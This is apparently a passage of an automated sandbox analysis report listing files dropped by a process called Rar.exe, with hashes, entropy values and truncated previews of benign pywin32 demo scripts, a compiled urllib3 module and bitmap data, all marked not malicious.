                                                                                                                                                                                                                                  SSDEEP:48:3y6A4HN1SSpUA+EQYvX7ws85K4CE8uG9G0N3Ae8wWv9O3ArDiPh:3y6A4HT1pdvX7h0mh9GcAFwWlIArDiPh
                                                                                                                                                                                                                                  MD5:972F998C8F66D2547E94CD2500734C3B
                                                                                                                                                                                                                                  SHA1:0EEDBA5459745EEEDD88AE1E20397074B0B6F1C0
                                                                                                                                                                                                                                  SHA-256:7018CFAFC9432294659187FCCC136662C375485E6FFB0AD60BE5C719438159F0
                                                                                                                                                                                                                                  SHA-512:9AA1320237BDF5AE4BEA149C1862AA0E5F81010DC35E5C8473867285943477A7538FE4DA2E2FF1697EFDBE34513FDFF15E9670BA566E005DBFA68C2BAA0F6ECE
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......=..fG........................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.g.Z.......d.d.d.d...Z.......d.d.d.d...Z.d.d.d...Z.......d.d.d.d...a.d.d.d.d...Z.d.d.d.d...Z.d.S.)......)...annotationsN)...partial..wait_for_read..wait_for_writeF..sock..socket.socket..read..bool..write..timeout..float | None..returnc....................C...sb...|.s.|.s.t.d.....g.}.g.}.|.r.|...|.....|.r.|...|.....t.t.j.|.|.|...}.|.|...\.}.}.}.t.|.p/|.p/|...S.).N.2must specify at least one of read=True, write=True)...RuntimeError..appendr......selectr....).r....r....r....r....Z.rcheckZ.wcheck..fnZ.rreadyZ.wreadyZ.xready..r.....AC:\Users\Public\M20EKMMEH2\lib\site-packages\urllib3\util\wait.py..select_wait_for_socket!...s..........................r....c........................s^...|.s.|.s.t.d.....d.}.|.r.|.t.j.O.}.|.r.|.t.j.O.}.t...........|.|.....d...f.d.d...}.t.|.|.....S.).Nr....r......tr....r......list[tuple[int, int]]c........................s....|.d.u.r.|.d.9.}.....|...S.).Ni....)...poll).r....
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):792
                                                                                                                                                                                                                                  Entropy (8bit):4.872080815758319
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:jsf9CzpJr+9f12fR3Ng5Ed8f6W/PEUzv37:QYzvr+992fBNgk8nf3
                                                                                                                                                                                                                                  MD5:D360933C44E9DEC9F75199B3651E6537
                                                                                                                                                                                                                                  SHA1:CDF798EC67E65CB9FAA6AF7C1D3500AED59B87F0
                                                                                                                                                                                                                                  SHA-256:A4AA23F9C16AA2E78A1A22A0C12B1854BC0019ABF33670672A52773C53249911
                                                                                                                                                                                                                                  SHA-512:4E964A2BFA726740784CB6EC44EAA3EA7E70CCF78FC8678C87855A9C135E71142B01392E1ED8A4F0CD12DC909D04C1A38C4715486A99A57B4B7F8B178B6CDE4C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## Demonstrates how to create a "pull" subscription.import win32con.import win32event.import win32evtlog..query_text = '*[System[Provider[@Name="Microsoft-Windows-Winlogon"]]]'..h = win32event.CreateEvent(None, 0, 0, None).s = win32evtlog.EvtSubscribe(. "System",. win32evtlog.EvtSubscribeStartAtOldestRecord,. SignalEvent=h,. Query=query_text,.)..while 1:. while 1:. events = win32evtlog.EvtNext(s, 10). if len(events) == 0:. break. ##for event in events:. ##.print(win32evtlog.EvtRender(event, win32evtlog.EvtRenderEventXml)). print("retrieved %s events" % len(events)). while 1:. print("waiting..."). w = win32event.WaitForSingleObjectEx(h, 2000, True). if w == win32con.WAIT_OBJECT_0:. break.
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):692
                                                                                                                                                                                                                                  Entropy (8bit):4.945280120308455
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:jVXv9/WEpLDZAEpJr+937U1KXASpvFKMwpM7tLNFKYVXWKdC/2BdVD49y4hfR3kF:jbWqzpJr+9bvFKTpyzFKYVXDq27VD49A
                                                                                                                                                                                                                                  MD5:52D985F0616A0F7455B5F7910B07182D
                                                                                                                                                                                                                                  SHA1:D4ACD75A93ACA5F4B3205A5AC340695A283A6039
                                                                                                                                                                                                                                  SHA-256:B6027143EE94E0E332D3851E23948BF6A98C4F6FEC26262703FAF6774FE3355D
                                                                                                                                                                                                                                  SHA-512:A53F1558E74F3E5B1C238E71A0EDD62BA0A5D0383C60F620B3489A8AA0387FA639BC871A14D042BB179C7E166E1413F672690B0E61F2E75D95CA10EA95C9BDC2
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## Demonstrates a "push" subscription with a callback function.import win32evtlog..query_text = '*[System[Provider[@Name="Microsoft-Windows-Winlogon"]]]'...def c(reason, context, evt):. if reason == win32evtlog.EvtSubscribeActionError:. print("EvtSubscribeActionError"). elif reason == win32evtlog.EvtSubscribeActionDeliver:. print("EvtSubscribeActionDeliver"). else:. print("??? Unknown action ???", reason). context.append(win32evtlog.EvtRender(evt, win32evtlog.EvtRenderEventXml)). return 0...evttext = [].s = win32evtlog.EvtSubscribe(. "System",. win32evtlog.EvtSubscribeStartAtOldestRecord,. Query="*",. Callback=c,. Context=evttext,.).
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4397
                                                                                                                                                                                                                                  Entropy (8bit):4.74911812392731
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:MgzkJJSBpe8lEILIzeU/lC2PHVH+YSrcsanIP9YO8OoUCDfOxVkfGbHyZrfpx4l4:MgY2vpEIANCaHFGh9YlU+GxifBx4i
                                                                                                                                                                                                                                  MD5:430E76B755434E0D55E9F95AFDB387D0
                                                                                                                                                                                                                                  SHA1:53171BBFFB86036C9BC312DAC4FA358C0D2DDC32
                                                                                                                                                                                                                                  SHA-256:CCB6A2880CAC7C9D67966F0185DBF8175F01F6C7DA76058D2B55E61CFA8FE687
                                                                                                                                                                                                                                  SHA-512:8381D4E1BC373FE7DC798D2DE6A2E785667374436AFC9BDBA701733C08B627028FD76F0D5C0A194FAD7CC99994CC9290F3478CBB5FCAD09EB046F521B016BF2F
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# Contributed by Kelly Kranabetter..import os.import sys..import ntsecuritycon.import pywintypes.import win32security.import winerror..# get security information.# name=r"c:\autoexec.bat".# name= r"g:\!workgrp\lim".name = sys.argv[0]..if not os.path.exists(name):. print(name, "does not exist!"). sys.exit()..print("On file ", name, "\n")..# get owner SID.print("OWNER").try:. sd = win32security.GetFileSecurity(name, win32security.OWNER_SECURITY_INFORMATION). sid = sd.GetSecurityDescriptorOwner(). print(" ", win32security.LookupAccountSid(None, sid)).except pywintypes.error as exc:. # in automation and network shares we see:. # pywintypes.error: (1332, 'LookupAccountName', 'No mapping between account names and security IDs was done.'). if exc.winerror != winerror.ERROR_NONE_MAPPED:. raise. print("No owner information is available")..# get group SID.try:. print("GROUP"). sd = win32security.GetFileSecurity(name, win32security.GROUP_SECURITY_INFORMATI
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1184
                                                                                                                                                                                                                                  Entropy (8bit):5.129410238641104
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:9a3KeaJjPAhAs/6tgRMBuXI/KPAoTAs/MtgRMBuXH:I3sGhAAQAMaAAuA3
                                                                                                                                                                                                                                  MD5:07D0143379349CB71B6701D8BF4D2480
                                                                                                                                                                                                                                  SHA1:8D13834D7BCEF11174F631C4EFDA3E45E18D31CB
                                                                                                                                                                                                                                  SHA-256:AA67DE1EC080EEFAD5CA4F5054778915AF8F282C2AF7D76243E66F409A1365B5
                                                                                                                                                                                                                                  SHA-512:13331E7E7504822C2F3E9C693E27774BAE16B3DDA738695C43EBB79DFB3102F573F957B2EF437CC0BC0732218300FCA1C9E1CBE9B78C81D15DB9949EF9E3A257
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import os..import win32con.import win32gui..filter = "Python Scripts\0*.py;*.pyw;*.pys\0Text files\0*.txt\0".customfilter = "Other file types\0*.*\0"..fname, customfilter, flags = win32gui.GetSaveFileNameW(. InitialDir=os.environ["temp"],. Flags=win32con.OFN_ALLOWMULTISELECT | win32con.OFN_EXPLORER,. File="somefilename",. DefExt="py",. Title="GetSaveFileNameW",. Filter=filter,. CustomFilter=customfilter,. FilterIndex=1,.)..print("save file names:", repr(fname)).print("filter used:", repr(customfilter)).print("Flags:", flags).for k, v in list(win32con.__dict__.items()):. if k.startswith("OFN_") and flags & v:. print("\t" + k)..fname, customfilter, flags = win32gui.GetOpenFileNameW(. InitialDir=os.environ["temp"],. Flags=win32con.OFN_ALLOWMULTISELECT | win32con.OFN_EXPLORER,. File="somefilename",. DefExt="py",. Title="GetOpenFileNameW",. Filter=filter,. CustomFilter=customfilter,. FilterIndex=0,.)..print("open file names:", repr(f
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3508
                                                                                                                                                                                                                                  Entropy (8bit):4.535330596706897
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:qLKMszTwVasgHhCIlwaoHHqohRohw36Fup8dZpIhyA:qLlszYa7QIlwaonqkRkw36c83gyA
                                                                                                                                                                                                                                  MD5:A703B33F30ADDE0B10973667F662CC7F
                                                                                                                                                                                                                                  SHA1:D93572C859D1AC36ABE313452812B68BC14B9E7C
                                                                                                                                                                                                                                  SHA-256:EA659B89FF3F9F1959C2B7AF8F075A0A2099533AFE7EB1CA7E72957732A05FF0
                                                                                                                                                                                                                                  SHA-512:45C55EE1037C5F25BE8F4B796A55D12E37DCB965F5DAC48E62903DB75AD984775CC5D13E81372EB94F8CE256CAD97E055F6BE8060CD835A213AFC468493E3459
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""A demo of using win32net.NetValidatePasswordPolicy...Example usage:..% NetValidatePasswordPolicy.py --password=foo change.which might return:..> Result of 'change' validation is 0: The operation completed successfully...or depending on the policy:..> Result of 'change' validation is 2245: The password does not meet the.> password policy requirements. Check the minimum password length,.> password complexity and password history requirements...Adding --user doesn't seem to change the output (even the PasswordLastSet seen.when '-f' is used doesn't depend on the username), but theoretically it will.also check the password history for the specified user...% NetValidatePasswordPolicy.py auth..which always (with and without '-m') seems to return:..> Result of 'auth' validation is 2701: Password must change at next logon."""..import optparse.import sys.from pprint import pprint..import win32api.import win32net.import win32netcon...def main():. parser = optparse.OptionParser(. "%pr
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2023
                                                                                                                                                                                                                                  Entropy (8bit):5.051057812294554
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:tYq2r8q7QjxNaerKec8dsgkcXKna4uuD44Drd:tYqSaaGKd8d/kcana4Brd
                                                                                                                                                                                                                                  MD5:1579B6CDBB6769E65896F32483CA08F5
                                                                                                                                                                                                                                  SHA1:D7FFA56CC5E829FFA5BCBB145644E0AB219DEB6C
                                                                                                                                                                                                                                  SHA-256:79D916989C1CA439CD602BF8C7A5FB7749421D64E0BFACBFF039B3F91E39A24A
                                                                                                                                                                                                                                  SHA-512:F34B2045343CD21CAB62955D197CEE1969998680FDA080CE7FFD4C904B9C38536193C2330E321FCCD14224F8258BBFC51DB963F61472C9293525C253B9BA9360
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import os..import win32api.import win32file.import winerror...def ReadCallback(input_buffer, data, buflen):. fnamein, fnameout, f = data. ## print fnamein, fnameout, buflen. f.write(input_buffer). ## python 2.3 throws an error if return value is a plain int. return winerror.ERROR_SUCCESS...def WriteCallback(output_buffer, data, buflen):. fnamebackup, fnameout, f = data. file_data = f.read(buflen). ## returning 0 as len terminates WriteEncryptedFileRaw. output_len = len(file_data). output_buffer[:output_len] = file_data. return winerror.ERROR_SUCCESS, output_len...tmp_dir = win32api.GetTempPath().dst_dir = win32api.GetTempFileName(tmp_dir, "oef")[0].os.remove(dst_dir).os.mkdir(dst_dir).print("Destination dir:", dst_dir)..## create an encrypted file.fname = win32api.GetTempFileName(dst_dir, "ref")[0].print("orig file:", fname).f = open(fname, "w").f.write("xxxxxxxxxxxxxxxx\n" * 32768).f.close().## add a couple of extra data streams.f = open(fname + ":stre
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1912
                                                                                                                                                                                                                                  Entropy (8bit):4.996086312535218
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:Zy02jhZ2V6v5kHEETdZUCOxtVbpVRN9H1Vbd0OVyVbrqVbH0:Z6jmAvUEEZZUFt7N9H1P/y1ql0
                                                                                                                                                                                                                                  MD5:741D38BEDF1C869EE787FC7ACAEC0021
                                                                                                                                                                                                                                  SHA1:13E733C166A8FDAFC61199E18B7D5E5D1CC5E8C7
                                                                                                                                                                                                                                  SHA-256:61E15FB3EBAB14C07BD6085672916195BA13259BFEE3E7DD4C6EF8DE99CF0BBB
                                                                                                                                                                                                                                  SHA-512:0B27730E1FEB8E10E03664789A588B8BA0B9E7B3D07F328B0E87C6F3A597B74A40A6BF9654A66035071C013D37EF543A65EAC0D4DFE074F4C6DE3FEDF655EA4C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import win32api.import win32con.import win32transaction..keyname = "Pywin32 test transacted registry functions".subkeyname = "test transacted subkey".classname = "Transacted Class"..trans = win32transaction.CreateTransaction(Description="test RegCreateKeyTransacted").key, disp = win32api.RegCreateKeyEx(. win32con.HKEY_CURRENT_USER,. keyname,. samDesired=win32con.KEY_ALL_ACCESS,. Class=classname,.).## clean up any existing keys.for subk in win32api.RegEnumKeyExW(key):. win32api.RegDeleteKey(key, subk[0])..## reopen key in transacted mode.transacted_key = win32api.RegOpenKeyTransacted(. Key=win32con.HKEY_CURRENT_USER,. SubKey=keyname,. Transaction=trans,. samDesired=win32con.KEY_ALL_ACCESS,.).subkey, disp = win32api.RegCreateKeyEx(. transacted_key,. subkeyname,. Transaction=trans,. samDesired=win32con.KEY_ALL_ACCESS,. Class=classname,.)..## Newly created key should not be visible from non-transacted handle.subkeys = [s[0] for s in win32api.RegEnu
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2063
                                                                                                                                                                                                                                  Entropy (8bit):5.11300797395737
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:01b8JS3KmpnnP7iS8sE2Nzp6De+/L6ye+2mMvHwzpbA+exs:+b8JwKmpPX8sJzpse+/eye+2mMPwzpcG
                                                                                                                                                                                                                                  MD5:1BE4DC6030AA23DD32D4E7CAD3A1F0D8
                                                                                                                                                                                                                                  SHA1:49F6308BF8E3A6F7D765B699A02F17393EBE2FB0
                                                                                                                                                                                                                                  SHA-256:B02E9C41D6E51EBE3926C1746E5372E62AC2613F847FFF95C5D6F9EA368572DF
                                                                                                                                                                                                                                  SHA-512:6D78179DBE0CABE9A2EEDD9FBFDDD0BD33B2A397E0D48AB05AFA4970424E22F4C262526E489FBB26B7565A43764D7CCEE8BD827FF09FFF4106E334DFCAE453D6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import os..import ntsecuritycon.import win32api.import win32con.import win32security.import winnt..temp_dir = win32api.GetTempPath().fname = win32api.GetTempFileName(temp_dir, "rsk")[0].print(fname).## file can't exist.os.remove(fname)..## enable backup and restore privs.required_privs = (. (. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_BACKUP_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_RESTORE_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),.).ph = win32api.GetCurrentProcess().th = win32security.OpenProcessToken(. ph, win32con.TOKEN_READ | win32con.TOKEN_ADJUST_PRIVILEGES.).adjusted_privs = win32security.AdjustTokenPrivileges(th, 0, required_privs)..try:. sa = win32security.SECURITY_ATTRIBUTES(). my_sid = win32security.GetTokenInformation(th, ntsecuritycon.TokenUser)[0]. sa.SECURITY_DESCRIPTOR.SetSecurityDescriptorOwner(my_sid, 0).. k, disp = win32api.RegCreateKeyEx(
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):7957
                                                                                                                                                                                                                                  Entropy (8bit):5.388617419802842
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:3jwj8c3w/SDwculj0wyi+Brwx6yO15ulj0PwxH/sZ003arjrarVyz9ovDkMq/nqf:leZDBA695ZkH/sX3+xFcXcvff0vt0vk
                                                                                                                                                                                                                                  MD5:E9EFEB93CB39D5E58DC872610C559C9B
                                                                                                                                                                                                                                  SHA1:E857D85B5FCE044393BB761C2066D5C6D80DB517
                                                                                                                                                                                                                                  SHA-256:B57538B210D4FD23437E3F0F9FCDA52FDA038F6CCB7E3BF4DB626D2C3EF8F200
                                                                                                                                                                                                                                  SHA-512:3B48E942370DBD06744B114DCDB230096E3AAACBA426A95F0361B10D780CDBD11188837490EECECE37C1940CE2216A6AC95D63287E10699DC19E4F88FA972D0A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import glob.import os.import time..import win32api.import win32con.import win32gui..## some of these tests will fail for systems prior to XP..for pname in (. ## Set actions all take an unsigned int in pvParam. "SPI_GETMOUSESPEED",. "SPI_GETACTIVEWNDTRKTIMEOUT",. "SPI_GETCARETWIDTH",. "SPI_GETFOREGROUNDFLASHCOUNT",. "SPI_GETFOREGROUNDLOCKTIMEOUT",. ## Set actions all take an unsigned int in uiParam. "SPI_GETWHEELSCROLLLINES",. "SPI_GETKEYBOARDDELAY",. "SPI_GETKEYBOARDSPEED",. "SPI_GETMOUSEHOVERHEIGHT",. "SPI_GETMOUSEHOVERWIDTH",. "SPI_GETMOUSEHOVERTIME",. "SPI_GETSCREENSAVETIMEOUT",. "SPI_GETMENUSHOWDELAY",. "SPI_GETLOWPOWERTIMEOUT",. "SPI_GETPOWEROFFTIMEOUT",. "SPI_GETBORDER",. ## below are winxp only:. "SPI_GETFONTSMOOTHINGCONTRAST",. "SPI_GETFONTSMOOTHINGTYPE",. "SPI_GETFOCUSBORDERHEIGHT",. "SPI_GETFOCUSBORDERWIDTH",. "SPI_GETMOUSECLICKLOCKTIME",.):. print(pname). cget = getattr(win32con, pname). cset =
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1126
                                                                                                                                                                                                                                  Entropy (8bit):4.847240732987727
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:j4TypXUFzmG73wIujOHRuMxqNclmIIzSrNyNHD4couDZgAuwsIo:aQXUDsILuMxXlmIoGYHxouDZHHsIo
                                                                                                                                                                                                                                  MD5:4F0AC86AB91546ECFCD2EAEFEC6A9516
                                                                                                                                                                                                                                  SHA1:847E7F42C9D282A1B8A7DFBEF8918341B76CFD75
                                                                                                                                                                                                                                  SHA-256:6DB2C4E7E5D5EFB2673FD1860F51627F0B84DB21A68AC331C51B3AFB41F7B684
                                                                                                                                                                                                                                  SHA-512:7A41AB6EE47275F89BEC82CE0EF9C6D417E88DCC094C653F95D1ABB88E6FC3FBA4F96A423071A32FEB2A3A8DD2D8AC1CBC9E2A33DA4C917ED234F347D1CB987D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import os..import win32api..ver_strings = (. "Comments",. "InternalName",. "ProductName",. "CompanyName",. "LegalCopyright",. "ProductVersion",. "FileDescription",. "LegalTrademarks",. "PrivateBuild",. "FileVersion",. "OriginalFilename",. "SpecialBuild",.).fname = os.environ["comspec"].d = win32api.GetFileVersionInfo(fname, "\\").## backslash as parm returns dictionary of numeric info corresponding to VS_FIXEDFILEINFO struc.for n, v in d.items():. print(n, v)..pairs = win32api.GetFileVersionInfo(fname, "\\VarFileInfo\\Translation").## \VarFileInfo\Translation returns list of available (language, codepage) pairs that can be used to retreive string info.## any other must be of the form \StringfileInfo\%04X%04X\parm_name, middle two are language/codepage pair returned from above.for lang, codepage in pairs:. print("lang: ", lang, "codepage:", codepage). for ver_string in ver_strings:. str_info = "\\StringFileInfo\\%04X%04X\\%s" % (lang,
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:PC bitmap, Windows 3.x format, 32 x 32 x 24, image size 3072, cbSize 3126, bits offset 54
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3126
                                                                                                                                                                                                                                  Entropy (8bit):4.866601281143834
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:QJbd92m1SGlnHZ4Yuu5I/p/UdCHMaVU42PVA0O0JR0Rj70Rp0OCv0QQH080D9m:QJbd911zlq/5JFj2NU6xyv9m
                                                                                                                                                                                                                                  MD5:67D3F80FA18D9298FB9BD346BF1905F3
                                                                                                                                                                                                                                  SHA1:8528E2B4B8E8681828518337925D2876809B7454
                                                                                                                                                                                                                                  SHA-256:4601AF795B74E772A5995E2A546C1D0ADACFC91034253E7B290BDFF4F34E22F5
                                                                                                                                                                                                                                  SHA-512:F52A0DF170AF6E1A43947C66EE5C97B9A2A7669A21FDABA24490CB97C5FD8450920E79AA2205D3E11DD7484D2CE95FAA7043D621E278025A9081C5F060BA7347
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:BM6.......6...(... ... ...........................................................................................................................................................................................................................................................................................@..@............................................................................................@..@........................................................................................."..$..&.... .. ..*..*.............................................................................."..$.... .. ..*..*....................................#.$#.$......................................."..$..&..)..+......................................#.$#.$.........................................."..$..&..)........................................................................................."..$..&..)..+................................$....................................................."..$..&..)
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:PC bitmap, Windows 3.x format, 32 x 32 x 24, image size 3072, cbSize 3126, bits offset 54
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3126
                                                                                                                                                                                                                                  Entropy (8bit):4.039217657290414
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:i27oH9YEJtIq0Q0x0P0n5Z0wZaG0WQv0NN0C0nw:dfRYw
                                                                                                                                                                                                                                  MD5:CA4F178B4A665A1DA21AEA80C7E796F7
                                                                                                                                                                                                                                  SHA1:3A7E64ADC019F45290C43B04E6A1072A55470586
                                                                                                                                                                                                                                  SHA-256:C22E778D80B2E76DDF1588FF1588331B577141D12BC3EA30DBFFDD7E85FD82C0
                                                                                                                                                                                                                                  SHA-512:97BDC1BAE0FAC2582ABF11F318937318D33EFF1664CCE499C4D95316A25CB87B0599E9E4CAA5D911B0F465E4F491A4E2F23E4EE87E14D9A0C8CE1FD6150982E9
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:BM6.......6...(... ... .................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................#.$#.$..........................................................................................#.$#.$..........................................................................................................................................................................................$...............................................................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script text executable Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2888
                                                                                                                                                                                                                                  Entropy (8bit):4.8375775005209265
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:knDxrrsqXh6/6LCN8Czanw7IbHbfqVGvr7lFqkVlL7ukeTX1:knDxrrTXg/6LC3GsKbfqVGjPqG3c1
                                                                                                                                                                                                                                  MD5:A333358AEA4B17F65D614B8ABFE55ED4
                                                                                                                                                                                                                                  SHA1:94F0486D40A0D9A6C65AE10CDD78122B37DB7F24
                                                                                                                                                                                                                                  SHA-256:FFED0CEB4B51A0800A19600776E389A112E465E842BCFC98EDE1E8426AF0DF5F
                                                                                                                                                                                                                                  SHA-512:F6B99C26C726D736A119AA10A4907AB61E8FA36CBB138EC7FAFBAD1E68A55BFC78F300B214639C7BB25F0DD1F6810F8E1AE7A1DE4C23FF43917C3E22A59AA45B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import os.import tempfile..import mmapfile.import win32api.import winerror.from pywin32_testutil import str2bytes..system_info = win32api.GetSystemInfo().page_size = system_info[1].alloc_size = system_info[7]..fname = tempfile.mktemp().mapping_name = os.path.split(fname)[1].fsize = 8 * page_size.print(fname, fsize, mapping_name)..m1 = mmapfile.mmapfile(File=fname, Name=mapping_name, MaximumSize=fsize).m1.seek(100).m1.write_byte(str2bytes("?")).m1.seek(-1, 1).assert m1.read_byte() == str2bytes("?")..## A reopened named mapping should have exact same size as original mapping.m2 = mmapfile.mmapfile(Name=mapping_name, File=None, MaximumSize=fsize * 2).assert m2.size() == m1.size().m1.seek(0, 0).m1.write(fsize * str2bytes("s")).assert m2.read(fsize) == fsize * str2bytes("s")..move_src = 100.move_dest = 500.move_size = 150..m2.seek(move_src, 0).assert m2.tell() == move_src.m2.write(str2bytes("m") * move_size).m2.move(move_dest, move_src, move_size).m2.seek(move_dest, 0).assert m2.read(move_s
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):335
                                                                                                                                                                                                                                  Entropy (8bit):4.496864057756722
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:9Msoe/ErAzXKkYHPUHyHmYTR7VgWxvyLW3StbYTR7Vf3v//ZeSZ/XJXrdiLUs6:OVe/EUTbZHyHmYTbvvebYTb/v/tJ7gL4
                                                                                                                                                                                                                                  MD5:9958EDE52157CBF9F56DFF07C4499108
                                                                                                                                                                                                                                  SHA1:5D1EABF96A11361804DDA8FB94BF9E3E902FA540
                                                                                                                                                                                                                                  SHA-256:DA45A4922FA32C3668876043811CCCC43198C89C263B17FBD3CDE4BDDD988496
                                                                                                                                                                                                                                  SHA-512:575187E4345C37B119838503400E938560BF5AAEE2B6CAAA62835BAC76EA832DC06E779C35EE898748116FA69807ABA580D5462490BE7738E2BC029E9855FBC1
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""cat.py.a version of unix cat, tweaked to show off runproc.py."""..import sys..data = sys.stdin.read(1).sys.stdout.write(data).sys.stdout.flush().while data:. data = sys.stdin.read(1). sys.stdout.write(data). sys.stdout.flush().# Just here to have something to read from stderr..sys.stderr.write("Blah...")..# end of cat.py.
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4029
                                                                                                                                                                                                                                  Entropy (8bit):4.550391036233513
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:qG4T/T68SbTXy62/K+KovQtw6guU/Tm3Z+Bo2x:qbLgXy6WKcHIEig
                                                                                                                                                                                                                                  MD5:EA0603E314B6C0CB3396B100E9AA1A2C
                                                                                                                                                                                                                                  SHA1:FE3D6C231A64E599C31582F58FD2B45C014C728B
                                                                                                                                                                                                                                  SHA-256:837AADE7BA490576FD507189F3BDA6EB0521F56EF44822A8BCD1057D1E271F08
                                                                                                                                                                                                                                  SHA-512:3A58C4569855F08E252D5C339A6B80308EA1FAD4168E9F50B9387631CFC118DEAD08F56DFA8D718614A24FC17F956637DEB10F36CAC95711C5A2A757941049DE
                                                                                                                                                                                                                                  Malicious:false
